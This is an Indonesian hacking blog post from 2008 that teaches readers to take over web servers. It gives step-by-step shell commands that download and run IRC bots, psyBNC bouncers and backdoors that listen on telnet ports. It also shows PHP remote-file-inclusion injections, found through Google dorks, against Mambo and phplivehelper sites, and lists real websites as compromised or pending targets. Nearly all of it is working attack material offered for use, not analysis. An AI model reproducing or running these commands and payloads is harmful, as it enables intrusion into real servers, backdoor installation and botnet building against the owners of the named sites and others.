kalian udah ga naeh kan chat di mirc...:D
kini saya mau kasih sedikit informasi dan ilmu kepada kalian, saya bukan nya ingin pamer tp saya hanya ingin membagi ilmu kepada kalian smw....
berikut ini tutorial cara menbuat psybnc dan boot :
1. uname -a;id <<== untuk melihat jenis server dan id
2. /sbin/ifconfig | grep inet<<== untuk melihat ip server
3. find / -type d -perm 777 |find . -type d -perm -2 -ls | find / -type d -user nobody <<== untuk melihat direktori yg tidak permission
denied
4. mkdir <<== untuk membuat direktori baru example: mkdir love
5. ls -alF <<== untuk melihat semua file dalam sebuah direktory
6. wget/lwp-download/curl -f -O <<== untuk mendownload file kita kedalam server
cara membuat bot dari server Linux:
1. cd /var/tmp;lwp-download http://www.geocities.com/kelelawar_kecil/kopler.tar.gz /
2. cd /var/tmp;tar -zxvf acz.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./dssl a.txt atau cd /var/tmp;./eggdrop -m a.txt tar -zxf
cara membuat bot dari server FreeBsd:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/aczbsd.tgz
2. cd /var/tmp;tar -zxvf aczbsd.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdop -m a.txt
cara load psy dari server Linux:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/AhoK.tar.gz
2. cd /var/tmp;tar -zxvf AhoK.tar.gz
3. cd /var/tmp;rm -fr AhoK.tar.gz
4. cd /var/tmp/AhoK;./config (IDENTD) (PORT)
5. cd /var/tmp/AhoK;./f**k
6. cd /var/tmp/AhoK;./run
1. cd /var/tmp;wget http://www.solsiden.info/psy/samsengpsy.tgz
2. cd /var/tmp;tar zxfv samsengpsy.tgz
3. cd /var/tmp;rm -fr samsengpsy.tgz
4. cd /var/tmp/samseng;./config (IDENTD) (PORT)
5. cd /var/tmp/samseng;./f**k
6. cd /var/tmp/samseng;./run
ada juga cara yang lebih mudah injek php tutorial nya :
*. Temukan target di google dengan keyword: allinurl:index.php?*.org option view itemid
extensi domain .org diatas dapat diganti menjadi extensi domain lain yang cukup populer seperti com,net,biz,org.edu, dll
Misalnya anda menemukan target: http://mitc.ictfund.org.eg/index.php?option=com_content&task=view&id=14&Itemid=30
*. Masukkan scripts injeksi: _REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
ke target yang udah kita dapatkan sebelumnya. Perlu diingat bahwa peletakan scripts diatas diletakkan sesudah php?
Sehingga target tersebut berubah menjadi:
http://mitc.ictfund.org.eg/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
*. Target bisa ditemukan apabila pada target yang kita access menampilkan page berisi informasi spesifikasi server yang digunakan
oleh pemilik web serta kolom kecil untuk menginput semua commands yang akan kita gunakan.
Commands Yang Digunakan Di PHP Injection
========================================
*. Check Server
uname -a;id;uptime;wget;/sbin/ifconfig|grep inet
*. Bot dengan Netgate.tcl Untuk Allnetwork
cd /dev/shm;wget http://coke-coke.org/dataku/eggmbonx.tar.gz; tar -zxvf eggmbonx.tar.gz
cd /dev/shm/mbonx;./nadya conf (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./run conf [httpd]
*. Bot dengan RemajaBot di Allnet
cd /dev/shm;wget http://coke-coke.org/tcl/kuris.tar.gz;tar -zvxf kuris.tar.gz
cd /dev/shm/kuris/scripts;rm -rf kuris.tcl
cd /dev/shm/kuris/scripts;wget http://coke-coke.org/rado/kuris.tcl
cd /dev/shm/kuris/scripts;wget http://coke-coke.org/rado/kuris.tcl
cd /dev/shm/kuris;rm -rf chanary.conf
cd /dev/shm/kuris;./neesya a.txt (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./eggdrop -m a.txt
find / -type d -perm 777
*. Bot Dengan Tcl Sendiri Misalnya vhyan78.tcl
cd /dev/shm;wget http://coke-coke.org/php/vhyan.tar.gz;tar -zvxf vhyan.tar.gz
cd /dev/shm/bete/scripts;wget http://coke-coke.org/vhyan78.tcl
disini kita bisa wget semua tcl yang kita butuhkan sesuai fungsi eggdrop nantinya
Edit config eggdrop anda dimana config tersebut berisi semua tcl yang dibutuhkan
Upload config tersebut ke salah satu web free hosting seperti geocities.com atau 1asphost.com
contoh config dapat anda peroleh di http://coke-coke.org/php/vian.txt
kita misalkan nama config adalah vian.txt
cd /dev/shm/bete;./eggdrop -m vian.txt
*.Membuat psyBNC port 31310
cd /dev/shm;wget http://coke-coke.org/tcl/prepsyBNC.tar.gz;tar -zvxf prepsyBNC.tar.gz
cd /dev/shm/kaka;./psybnc
*.Membuat psyBNC dengan port dan ident tertentu
cd /dev/shm;wget geocities.com/ratapan_anak_angkat/shell/test.tgz.tgz; tar -zxvf test.tgz.tgz; cd redone; ./config Farhan 2206; ./fuck;./run
cd /var/tmp;curl -o vhyan.tar.gz http://geocities.com/aboutbahri/redone.tar.gz; tar -zxvf redone.tar.gz; cd redone; ./config Farhan 2206; ./fuck;./run
cd /var/tmp;wget http://geocities.com/aboutbahri/redone.tar.gz;tar -zxvf redone.tar.gz; cd redone; ./config Farhan 3351; ./fuck; ./run
* bot dalnet cd /var/www/html;curl -o vhyan.tar.gz http://geocities.com/dat.tar.gz; tar -zxvf dat.tar.gz; cd.dat; ./nadya a.txt laskar Q-max 64.34.72.171 aneka mahameru; ./eggdrop -m a.txt
cd /var/tmp;curl -o vhyan.tar.gz http://undem.no/tools/busuk.tgz; tar -zxvf busuk.tgz; cd .dat; ./nadya a.txt borju pLayBoy 82.192.84.188 arca mahameru; ./eggdrop -m a.txt
*.wget www.geocities.com/p3mula/sonix/psy.tar.gz
* cd /var/tmp;wget http://www.artofcar.ch/event/allnetwork.tar.gz;
tar -zvxf allnetwork.tar.gz;
cd kiss-allnet;
./nadya conf THIEF-05 kiss 66.235.201.105 kiss THIEF;
./eggdrop -m conf
* Liat IP /sbin/ifconfig
*.BackDoor Session
++ telnet:1979
wget http://www.freshstation.org/nina.php/as.tar.gz
cd /dev/shm;tar -zxvf as.tar.gz
cd /dev/shm/awyeah;./fuck
cd /dev/shmawyeah;./run
++ telnet 1666
cd /dev/shm;wget geocities.com/pinscasher/r0nin.zip;unzip r0nin.zip;chmod 777 r0nin;./r0nin
++ linux shv4
cd /dev/shm;wget http://geocities.com/remaja_crew/shv4.tar.gz;tar -zvxf shv4.tar.gz;cd shv4;./setup (PASSWORD) (PORT)
COMMANDS CADANGAN
==================
*. Jika wget tidak berfungsi
gunakan curl -o
misalnya untuk wget http://coke-coke.org/php/vhyan.tar.gz
menjadi: curl -o vhyan.tar.gz http://coke-coke.org/php/vhyan.tar.gz
*. Jika Dir tmp Tidak dapat Digunakan
gunakan cd /dev/shm sebagai dir pengganti cd /dev/shm
*. Mencari Dir yang terbuka
gunakan find / -type d -perm 777
cd /dev/shm;wget www.geocities.com/phaul10/evil.tar.gz
cd /dev/shm;tar -zvxf evil.tar.gz
cd /dev/shm/evil;./vadim 202.51.231.38 389 nasa.gov
=====ala cempe ====
cari: ./phplivehelper/blank.php
./blank.php <<< diganti /initiate.php?abs_path=http://we-dhuz.com/tmp/kek.jpg?
mis: livehelp2.inmagine.com/phplivehelper/blank.php
menjadi: livehelp2.inmagine.com/phplivehelper/initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
contoh: http://www.strokerdvd.com/phplivehelper/initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
masukkan: /initiate.php?abs_path=http://www.geocities.com/hackingisart/vhyan.txt?&cmd
===========
cd /var/tmp; wget http://coke-coke.org/rado/rado.tar.gz
cd /var/tmp;tar -zvxf rado.tar.gz
cd /var/tmp/.dat;./nadya a.txt (NICK) (IDENT) (IP) (CHANNEL) (OWNER);./eggdrop -m a.txt
-= target =-
http://www.b9mat.com.sa/index.php?page
http://www.gay.gr/index.php?svc
-= baru =-
http://www.sirofin.gr/english/index.php?page=http://geocities.com/bodohaja/ibliz.txt?
http://www.diplomaline.gr/en/index.php?page=http://geocities.com/bodohaja/ibliz.txt?
-= selesai =-
http://www.magdas-kamares.gr/index.php?lang=http://www.geocities.com/hackingisart/vhyan.txt?
http://www.bhulisa.co.za/index.php?page=http://www.geocities.com/bodohaja/ibliz.txt? <=- gantung
http://www.legacys.co.za/index.php?page=http://www.geocities.com/bodohaja/ibliz.txt? <=- gantung
http://cg.nuku.com.tw/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
http://book.yhps.tn.edu.tw/nuke/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
http://student.hk/study/strategy/index.php?file=http://www.geocities.com/hackingisart/vhyan.txt? <=- gantung
the oblivion
the loft
Niagara
grind
- wget http://ricko03.freeprohost.com/cupu.tar.gz;
- atau lwp-download http://volvoline.de/cupu.tar.gz;
- tar zxvf cupu.tar.gz;
- cd cupu;
- ./nadya bot.txt borju plAybOy 66.234.201.105 arca mahameru;
- ./fuck;
- ./run bot.txt /usr/local/apache/bin/httpd
- ./eggdrop -m bot.txt
http://volvoline.de/cupu.tar.gz <=- bot
http://ricko03.freeprohost.com/BuaTpsyBNCnBOT.txt
http://www.cantdeny.com/brokendestiny/protection.php?action=logout&siteurl
selamat mencoba nya yah kawan-kawan....
klo da kekurangan nya tulung di tambahin yah ma kawan-kawan yang sudah lebih mengerti dari saya...
Jumat, 09 Mei 2008
Langganan:
Postingan (Atom)